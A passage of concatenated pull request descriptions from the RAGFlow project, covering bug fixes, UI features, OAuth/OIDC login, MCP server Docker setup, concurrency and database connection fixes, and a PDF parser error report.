that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
Add `/login/channels` route and improve auth logic to support frontend
integration with third-party login providers:
- Add `/login/channels` route to provide authentication channel list
with `display_name` and `icon`
- Optimize user info parsing logic by prioritizing `avatar_url` and
falling back to `picture`
- Simplify OIDC token validation by removing unnecessary `kid` checks
- Ensure `client_id` is safely cast to string during `audience`
validation
- Fix typo
---
- Related pull request: #7379
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Fix:When sharing the knowledge base of multiple tenants with one person,
when this person queries the knowledge base of both tenants, they will
only query the question of the first person's knowledge base
Co-authored-by: 杜有强 <duyq@internal.ths.com.cn>
### What problem does this PR solve?
1. Add delete_by_ids method
2. Add get_doc_ids_by_doc_names
3. Improve user_canvan_version's logic (avoid O(n) db IO)
4. Improve document delete logic (avoid O(n) db IO)
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: 马继龙 <majilong@ideal.com>
### What problem does this PR solve?
Fix: After deleting the file from the file management menu, it was not
removed from the MinIO bucket.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
This is a follow-up of #7088 , adding a knowledge base type input to the
`Begin` component, and a knowledge base selector to the agent flow debug
input panel:

then you can select one or more knowledge bases when testing the agent:

Note: the lines changed in `agent/component/retrieval.py` after line 94
are modified by `ruff format` from the `pre-commit` hooks, no functional
change.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7466
I think due to some times we can not get position
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When parsing documents containing images, the current code uses a
single-threaded approach to call the VL model, resulting in extremely
slow parsing speed (e.g., parsing a Word document with dozens of images
takes over 20 minutes).
By switching to a multithreaded approach to call the VL model, the
parsing speed can be improved to an acceptable level.
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
fixed errror when vars of cnt begin declare with key contain "begin"
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix https://github.com/infiniflow/ragflow/issues/7224 and
https://github.com/infiniflow/ragflow/issues/6793
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)a
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Fix instructions for Ollama
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
1. Use `host.docker.internal` as base URL
2. Fix numbers in list
3. Make clear what is the console input and what is the output
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix `filed_map` was incorrectly persisted. #7412
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the dataset page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change create dataset delimiter default value to r'\n'
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the dataset list page style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix#6600
Hello, I have the same business requirement as #6600. My use case is:
We have many departments (> 20 now and increasing), and each department
has its own knowledge base. Because the agent workflow is the same, so I
want to change the knowledge base on the fly, instead of creating agents
for every department.
It now looks like this:

Knowledge bases can be selected from the dropdown, and passed through
the variables in the table. All selected knowledge bases are used for
retrieval.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7407
Based on this context, I think there should be some reasons that let
some LLMs have a mismatch (add the wrong "@xxx"),
So I think when use fid can not fetch llm then tried to just use name
should can fetch it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Remove unnecessary parameter restrictions in dataset creation API
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Deprecate get_dataset_id_and_document_id fixture, use add_document
instead
### Type of change
- [x] Update test cases
### What problem does this PR solve?
Feat: Using IconFont as an additional icon library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When you removed any document in a knowledge base using knowledge graph,
the graph's `removed_kwd` is set to "Y".
However, in the function `graphrag.utils.get_gaph`, `rebuild_graph`
method is passed and directly return `None` while `removed_kwd=Y`,
making residual part of the graph abandoned (but old entity data still
exist in db).
Besides, infinity instance actually pass deleting graph components'
`source_id` when removing document. It may cause wrong graph after
rebuild.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify background color of Card #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen3 and more LLMs.
Close#7296
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a language switch drop-down box to the top navigation bar
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the segmented component style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the create dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix the redis lock will always timeout (change the logic order release
lock first)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the home page #3321
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Bind data to the agent module of the home page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for OAuth2 and OpenID Connect (OIDC) authentication,
allowing OAuth/OIDC authentication using the specified routes:
- `/login/<channel>`: Initiates the OAuth flow for the specified channel
- `/oauth/callback/<channel>`: Handles the OAuth callback after
successful authentication
The callback URL should be configured in your OAuth provider as:
```
https://your-app.com/oauth/callback/<channel>
```
For detailed instructions on configuring **service_conf.yaml.template**,
see: `./api/apps/auth/README.md#usage`.
- Related issues
#3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
When updating a chat assistant using API,if the dataset attached by the
current chat assistant is not empty,setting dataset to
null("dataset_ids":[]) will cause update failure:'dataset_ids' can't be
empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add AsyncTreeSelect component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
当前graphrag的LOOP_PROMPT,会导致模型输出Y之后,继续补充了实体和关系,比较浪费时间。参照[graph
rag](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py)最新的代码,修改了LOOP_PROMPT,经过验证,修改后可以稳定的输出Y停止。
Currently, GraphRAG’s LOOP_PROMPT causes the model to keep appending
entities and relationships even after outputting “Y,” which wastes time.
Referring to the latest code in
[graphRAG](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py),
I modified the LOOP_PROMPT, and after verification the updated prompt
reliably outputs “Y” and stops.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
0.18.0 mcp server can not start with upgrade from 0.17.2 or new install
except rebuild all docker
Close#7321
mcp server can not start auto from docker :
2025-04-25 17:30:44,512 INFO 25 task_executor_2a9f3e2de99a_0 reported
heartbeat: {"name": "task_executor_2a9f3e2de99a_0", "now":
"2025-04-25T17:30:44.509+08:00", "boot_at":
"2025-04-25T16:43:33.038+08:00", "pending": 0, "lag": 0, "done": 0,
"failed": 0, "current": {}}
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
problem:
server.py in docker start arguments not correct , so mcp server start
fail
reason:
```
1. docker-copose.yaml
example - --mcp-host-api-key="ragflow-12345678" is wrong. do not add "" to key or it says:"api-key wrong"
2.docker file entrypoint.sh can not translate config to exec command , we need mapping file from host to docker
- ./entrypoint.sh:/ragflow/entrypoint.sh
3.just add one code raw fix all probelm
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Performance Improvement
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
In the generate_confirmation_token method, a spelling error was found
with 'tenent_id'. The correct spelling should be 'tenant_id'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: shengliang xiao <shengliangxiao2024@gmail.com>
With current config will get error "Fail to access model(gemma-7b-it)
using this api key"
Since the model has been removed, according to Groq official document:
https://console.groq.com/docs/models
### Type of change
- [ x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Batch operations on documents in a dataset #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhance capability of `list_docs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Create empty document. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter document by running status and file type. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save document metadata #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6984
1. Markdown parser supports get pictures
2. For Native, when handling Markdown, it will handle images
3. improve merge and
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Save the configuration information of the knowledge base document
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the document configuration dialog with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds the support for latest OpenSearch2.19.1 as the store engine
& search engine option for RAGFlow.
### Main Benefit
1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is
much better than Elasticsearch
2. For search, OpenSearch2.19.1 supports full-text
search、vector_search、hybrid_search those are similar with Elasticsearch
on schema
3. For store, OpenSearch2.19.1 stores text、vector those are quite
simliar with Elasticsearch on schema
### Changes
- Support opensearch_python_connetor. I make a lot of adaptions since
the schema and api/method between ES and Opensearch differs in many
ways(especially the knn_search has a significant gap) :
rag/utils/opensearch_coon.py
- Support static config adaptions by changing:
conf/service_conf.yaml、api/settings.py、rag/settings.py
- Supprt some store&search schema changes between OpenSearch and ES:
conf/os_mapping.json
- Support OpenSearch python sdk : pyproject.toml
- Support docker config for OpenSearch2.19.1 :
docker/.env、docker/docker-compose-base.yml、docker/service_conf.yaml.template
### How to use
- I didn't change the priority that ES as the default doc/search engine.
Only if in docker/.env , we set DOC_ENGINE=${DOC_ENGINE:-opensearch}, it
will work.
### Others
Our team tested a lot of docs in our environment by using OpenSearch as
the vector database ,it works very well.
All the conifg for OpenSearch is necessary.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Delete and rename files in the knowledge base #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display document parsing status #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The lock is not released correctly when task_exectuor is abnormal
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Some models force thinking, resulting in the absence of the think tag in
the returned content
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes after we commit the code and open the PR the CI pipeline fails
in Ruff checks. Including a pre-commit we can identify this problem
early and avoid time loss.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix the entrypoint file from the docker container to solve #7249
Here is the important part from the logs:
```
docker logs -f ragflow-server
...
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
...
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes an issue with the MCP server configuration in RAGFlow's
Docker deployment where:
1. Incorrect parameter naming (`--mcp--host-api-key` with double
hyphens) caused server startup failures
2. Port binding conflicts occurred due to unexposed MCP ports in Docker
3. Inconsistent host addressing between `0.0.0.0` and `127.0.0.1` led to
connectivity issues
The changes ensure proper MCP server initialization and reliable
inter-service communication.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Key Changes
1. **Parameter Correction**:
- Fixed `--mcp--host-api-key` → `--mcp-host-api-key`
### What problem does this PR solve?
Feat: Deleting files in batches. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The knowledge_graph chunk method is deprecated and should no longer be
used. #7184.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Enhance capability of `list_kbs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Show the owner of this knowledge base on the list card. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Even if the knowledge base has slices, the chunk method can be
changed #7115
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Knowledge Graph Extraction Conflict Between Dataset-Level and
File-Specific Configurations #7198
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix retrieval testing wrong pagination. #7171
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Put the knowledge base list related hooks into use-knowledge-request.ts
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Move langfuse configuration to api page #6155
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter the knowledge base list using owner #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR changes Redis to be a statefulset. In some situation when we
Redis pod gets rescheduled to another Node, it gets stuck in pending
state due to the PVC attached to another Kubernetes node.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [X] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When parsing pptx files, some shapes do not contain the `shape_type`
attribute, which causes the original code to throw an exception during
extraction, leading to failure in content extraction. This optimization
introduces handling logic for such anomalous shapes, providing a safer
and more robust processing mechanism.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add mcp self-host mode, a complement of #7084.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add mcp self-host mode documentation, a complement of #7141.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Hello, I encountered a problem when trying to use a S3 backend
(seaweedfs) for storage in RAGFlow: when calling
`STORAGE_IMPL.get("bucket", "key")`, the actual request sent to S3 is
`bucket/bucket/key`, causing a `NoSuchKey` error.
I compared the code in `s3_conn.py` to `minio_conn.py` and
`oss_conn.py`, then decided to remove the `else` branch in
`use_prefix_path` method, and it works. I didn't configure `prefix_path`
or `bucket` in `s3` section of the `service_conf.yaml`.
I think this is a bug, but not sure.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add MCP support with a client example.
Issue link: #4344
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Documentation for MCP server
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
If you deploy Ragflow using Kubernetes, the hostname will change during
a rolling update. This causes the consumer name of the task executor to
change, making it impossible to schedule tasks that were previously in a
pending state.
To address this, I introduced a recovery task that scans these pending
messages and re-publishes them, allowing the tasks to continue being
processed.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
## Problem Description
Multiple files in the RAGFlow project contain closure trap issues when
using lambda functions with `trio.open_nursery()`. This problem causes
concurrent tasks created in loops to reference the same variable,
resulting in all tasks processing the same data (the data from the last
iteration) rather than each task processing its corresponding data from
the loop.
## Issue Details
When using a `lambda` to create a closure function and passing it to
`nursery.start_soon()` within a loop, the lambda function captures a
reference to the loop variable rather than its value. For example:
```python
# Problematic code
async with trio.open_nursery() as nursery:
for d in docs:
nursery.start_soon(lambda: doc_keyword_extraction(chat_mdl, d, topn))
```
In this pattern, when concurrent tasks begin execution, `d` has already
become the value after the loop ends (typically the last element),
causing all tasks to use the same data.
## Fix Solution
Changed the way concurrent tasks are created with `nursery.start_soon()`
by leveraging Trio's API design to directly pass the function and its
arguments separately:
```python
# Fixed code
async with trio.open_nursery() as nursery:
for d in docs:
nursery.start_soon(doc_keyword_extraction, chat_mdl, d, topn)
```
This way, each task uses the parameter values at the time of the
function call, rather than references captured through closures.
## Fixed Files
Fixed closure traps in the following files:
1. `rag/svr/task_executor.py`: 3 fixes, involving document keyword
extraction, question generation, and tag processing
2. `rag/raptor.py`: 1 fix, involving document summarization
3. `graphrag/utils.py`: 2 fixes, involving graph node and edge
processing
4. `graphrag/entity_resolution.py`: 2 fixes, involving entity resolution
and graph node merging
5. `graphrag/general/mind_map_extractor.py`: 2 fixes, involving document
processing
6. `graphrag/general/extractor.py`: 3 fixes, involving content
processing and graph node/edge merging
7. `graphrag/general/community_reports_extractor.py`: 1 fix, involving
community report extraction
## Potential Impact
This fix resolves a serious concurrency issue that could have caused:
- Data processing errors (processing duplicate data)
- Performance degradation (all tasks working on the same data)
- Inconsistent results (some data not being processed)
After the fix, all concurrent tasks should correctly process their
respective data, improving system correctness and reliability.
### What problem does this PR solve?
Feat: Rendering a search test list with real data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
… bytes-like object
### What problem does this PR solve?
fix bug #6990 internal server error ehile chunking:expected string or
bytes-like object
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7083
Internal due to when returning from ES, fields changed to str, so the
bool conversion does not work as expected.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
when there are multiple entities, the variable `v` may be a list, which
will lead to this error:
```
| File "/mnt/d/wrf/ragflow/ragflow/graphrag/utils.py", line 59, in replace_all
| result = result.replace(f"{{{k}}}", v)
| TypeError: replace() argument 2 must be str, not list
```
this pr assign this `v` to be a str
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When running graph resolution with infinity, if single quotation marks
appeared in the entities name that to be delete, an error tokenizing of
sqlglot might occur after calling infinity.
For example:
```
INFINITY delete table ragflow_xxx, filter knowledge_graph_kwd IN ('entity') AND entity_kwd IN ('86 IMAGES FROM PREVIOUS CONTESTS', 'ADAM OPTIMIZATION', 'BACKGROUND'ESTIMATION')
```
may raise error
```
Error tokenizing 'TS', 'ADAM OPTIMIZATION', 'BACKGROUND'ESTIMATION''
```
and make the document parsing failed。
Replace one single quotation mark with double single quotation marks can
let sqlglot tokenize the entity name correctly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The assistant message placeholder is incorrect, I have finished
modifying both Chinese and traditional Chinese characters
### Type of change
- [x] Bug Fix
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6548
### Related PR:
https://github.com/infiniflow/ragflow/pull/6861
### Environment:
Commit version:
[[48730e0](48730e00a8)]
### Bug Description:
Unexpected `pymysql.err.InterfaceError: (0, '') `when using Peewee +
PyMySQL + PooledMySQLDatabase after a long-running `chat streamly`
operation.
This is a common issue with Peewee + PyMySQL + connection pooling: you
end up using a connection that was silently closed by the server, but
Peewee doesn't realize it's dead.
**I found that the error only occurs during longer streaming outputs**
and is unrelated to the database connection context, so it's likely
because:
- The prolonged streaming response caused the database connection to
time out
- The original database connection might have been disconnected by the
server during the streaming process
### Why This Happens
This error happens even when using `@DB.connection_context() `after the
stream is done. After investigation, I found this is caused by MySQL
connection pools that appear to be open but are actually dead (expired
due to` wait_timeout`).
1. `@DB.connection_context()` (as a decorator or context manager) pulls
a connection from the pool.
2. If this connection was idle and expired on the MySQL server (e.g.,
due to `wait_timeout`), but not closed in Python, it will still be
considered “open” (`DB.is_closed() == False`).
3. The real error will occur only when I execute a SQL command (such as
.`get_or_none()`), and PyMySQL tries to send it to the server via a
broken socket.
### Changes Made:
1. I implemented manual connection checks before executing SQL:
```
try:
DB.execute_sql("SELECT 1")
except Exception:
print("Connection dead, reconnecting...")
DB.close()
DB.connect()
```
2. Delayed the token count update until after the streaming response is
completed to ensure the streaming output isn't interrupted by database
operations.
```
total_tokens = 0
for txt in chat_streamly(system, history, gen_conf):
if isinstance(txt, int):
total_tokens = txt
......
break
......
if total_tokens > 0:
if not TenantLLMService.increase_usage(self.tenant_id, self.llm_type, txt, self.llm_name):
logging.error("LLMBundle.chat_streamly can't update token usage for {}/CHAT llm_name: {}, content: {}".format(self.tenant_id, self.llm_name, txt))
```
### What problem does this PR solve?
Fix: Files being parsed are not allowed to be deleted in batches #7065
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
docs(api): Fix request method in Related Questions example (DELETE→POST)
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6905
When deleting a document will check before removing it from storage
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add fallback for bad citation output. #6948
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix Helm Ingress template; Trying to access a global variable within a
loop
Fix#6191
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Remove the rotation state of the button that parses the document
#7008
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: The selected state of the TreeView node cannot be seen on Mac #7000
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix update_progress issue introduced by #6975
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fix api page translation issue. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes a slide may trigger a Proxy error (ArgumentException:
Parameter is not valid) due to issues in the original file, and this
error message can be confusing for users.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):
### What problem does this PR solve?
Considering the ragflow_deps image is only available for `linux/amd64`
platform, if we try to run the docker build commands in ,macOS for
instance, without the platform flag, we get an error due to the
different platform. Specifying the platform in the docker build command
fixes this issue.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [X] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
i use PdfParser in local(refer to this case:
https://github.com/infiniflow/ragflow/blob/main/rag/app/paper.py) like
this:
```
import re
import openpyxl
from ragflow.api.db import ParserType
from ragflow.rag.nlp import rag_tokenizer, tokenize, tokenize_table, add_positions, bullets_category, \
title_frequency, \
tokenize_chunks
from ragflow.rag.utils import num_tokens_from_string
from ragflow.deepdoc.parser import PdfParser, ExcelParser, DocxParser,PlainParser
def logger(prog=None, msg=""):
print(msg)
class Pdf(PdfParser):
def __init__(self):
self.model_speciess = ParserType.MANUAL.value
super().__init__()
def __call__(self, filename, binary=None, from_page=0,
to_page=100000, zoomin=3, callback=None):
from timeit import default_timer as timer
start = timer()
callback(msg="OCR is running...")
self.__images__(
filename if not binary else binary,
zoomin,
from_page,
to_page,
callback
)
callback(msg="OCR finished.")
print("OCR:", timer() - start)
self._layouts_rec(zoomin)
callback(0.65, "Layout analysis finished.")
print("layouts:", timer() - start)
self._table_transformer_job(zoomin)
callback(0.67, "Table analysis finished.")
self._text_merge()
tbls = self._extract_table_figure(True, zoomin, True, True)
self._concat_downward()
self._filter_forpages()
callback(0.68, "Text merging finished")
# clean mess
for b in self.boxes:
b["text"] = re.sub(r"([\t ]|\u3000){2,}", " ", b["text"].strip())
return [(b["text"], b.get("layout_no", ""), self.get_position(b, zoomin))
for i, b in enumerate(self.boxes)], tbls
```
show err like this:
```
File "xxxxx/third_party/ragflow/deepdoc/parser/pdf_parser.py", line 1039, in __images__
self.pdf.close()
AttributeError: 'PdfReader' object has no attribute 'close'
```
i found ragflow source code use
`pdfplumber.open`(https://github.com/infiniflow/ragflow/blob/main/deepdoc/parser/pdf_parser.py#L1007C28-L1007C43)
and replace` self.pdf `with ` pdf2_read` (from pypdf import PdfReader as
pdf2_read)in line 1024
(https://github.com/infiniflow/ragflow/blob/main/deepdoc/parser/pdf_parser.py#L1024)
```
self.pdf = pdf2_read
```
---
and I found that `pdfplumber` can be used in this way:
```
file_path="xxx.pdf"
res = pdfplumber.open(file_path)
res.close()
```
but `pypdf.PdfReader` source code do not has `close` func, source code
use like this
```
with open(stream, "rb") as fh:
